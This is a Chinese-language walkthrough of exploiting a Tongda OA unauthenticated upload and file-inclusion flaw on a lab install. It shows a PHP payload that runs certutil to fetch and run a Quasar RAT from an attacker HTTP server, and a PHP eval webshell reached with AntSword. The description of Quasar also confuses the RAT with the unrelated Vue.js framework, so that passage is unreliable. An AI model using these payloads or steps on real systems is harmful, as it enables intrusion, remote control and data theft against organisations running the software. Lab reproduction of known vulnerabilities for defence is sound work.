一、漏洞描述
通達OA是由北京通達信科科技有限公司開發的一款辦公系統,前一段時間通達官方在其官網釋出了安全提醒與更新程式,並披露有使用者遭到攻擊。攻擊者可在未授權的情況下可上傳圖片木馬檔案,之後透過精心構造的請求進行檔案包含,實現遠端命令執行,且攻擊者無須登陸認證即可完成攻擊。
二、環境搭建
1、靶機通達OA下載,一鍵安裝
下載地址:http://www.tongda2000.com/download/down.php?VERSION=2019&code=86d3V9EzrapwAKhPkxfbNZDsfB48gbFvbS0QYsUr%2FnNWNP2e5Fn%2F&F=baidu_natural&K=
訪問該網站:
2、掃描漏洞
2.1 安全測試工具下載,這裡使用的是Exp-tools工具
Exp-Tools是一個使用ExpDemo-JavaFX專案開發的安全測試工具,可以復現和分析多種OA系列的檔案上傳、命令執行、反序列化等漏洞。目前已實現了用友、泛微、通達、致遠、帆軟、萬戶、藍凌、紅帆、金和、華天動力等10個OA的漏洞,支援前臺和後臺。
Exp-tools下載地址:
https://github.com/cseroad/Exp-Tools
下載完成後需將此檔案複製到jdk8的bin目錄下,
該工具需使用JDK8啟動
開啟終端,cd 到jdk8的bin目錄下
JDK8下載地址
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html
2.2 填入網址,掃描漏洞
開啟該軟體,填入地址,驗證檢視掃描的資訊,發現裡面存在OA漏洞。
攻擊者可以透過漏洞植入程式碼。
三、建立木馬
3.1 產看漏洞資訊
我們選擇上傳一個RAT木馬,
遠端訪問特洛伊木馬(RAT,Remote Access Trojan)是一種惡意程式,能夠讓駭客監視和控制您的計算機、網路裝置甚至整個網路。
與絕大多數惡意軟體相同,RAT 通常會偽裝成合法檔案。駭客會將 RAT 附加到 E-mail 或大型軟體包(如遊戲)當中,廣告和惡意網頁中也可能會包含 RAT。與某些惡意軟體和病毒不同,使用者在下載到 RAT 時會很難分辨,它也不會主動拖慢計算機或其它網路裝置的負載。所以在某些情況下,一些使用者即便被 RAT 感染多年也沒能發現。
如果要想避免 RAT,請不要從不信任的來源下載檔案;不要開啟陌生人的電子郵件附件;不要從非可靠來源下載遊戲或軟體,更不建議使用盜版;保持安全補丁更新也可以使您的瀏覽器和作業系統保持最新狀態。
3.2 下載Quasar工具
下載地址:https://github.com/quasar/Quasar/releases
Quasar是一個強大且多功能的Vue.js框架,為開發者提供了構建跨平臺應用程式的便利性和靈活性。其豐富的元件庫、一體化的工具和跨平臺支援使得開發者能夠更輕鬆地構建現代化的Web、移動和桌面應用程式。
同時Quasar是一種公開可用的開源遠端訪問木馬(RAT),主要針對Windows作業系統,它透過惡意附件在網路釣魚電子郵件中分發,改專案最初是由GitHub使用者MaxXor開發,用於合法用途,然而該工具此後被駭客用於各種網路間諜活動。
詳細介紹:https://blog.csdn.net/qq_29901385/article/details/134596249
3.3 使用Quasar進行木馬植入
建立木馬流程:
3.3.1
3.3.2
3.3.3
3.3.4
3.3.5
這樣我們就生成了遠端訪問木馬,接下來將木馬植入OA系統中
四、 上傳RAT木馬
4.1 首先將本地可執行程式,搭建為一個http伺服器,埠為8000。
開啟cmd,cd切換到可執行檔案的目錄,填入以下命令。
C:\Users\123456\Desktop>client.exe -python -m http.server 8000
4.2 在Exp-tools中寫入改程式碼,上傳成功。
<?php
system.("certutil.exe -urlcache -split -f http://192.168.2.11:8000/client.exe");
?>
Windows有一個名為CertUtil的內建程式,可用於在Windows中管理證書。使用此程式可以在Windows中安裝,備份,刪除,管理和執行與證書和證書儲存相關的各種功能。
CertUtil的一個特性是能夠從遠端URL下載證書或任何其他檔案。
詳細介紹請檢視:https://www.cnblogs.com/nebulapioneer/p/18299419
4.3 開啟quasar,開始監聽埠
4.4 網頁訪問該地址時,木馬程式執行
4.5 檢視quasar,成功獲取該主機
倘若不出現,多執行幾遍以上cmd中命令
五、上傳一句話木馬,利用蟻劍連線
5.1 利用Exp-tools上傳木馬
<?php
@eval ($_POST['pass']);
?>
5.2 開啟蟻劍,連線主機
成功得到主機資訊!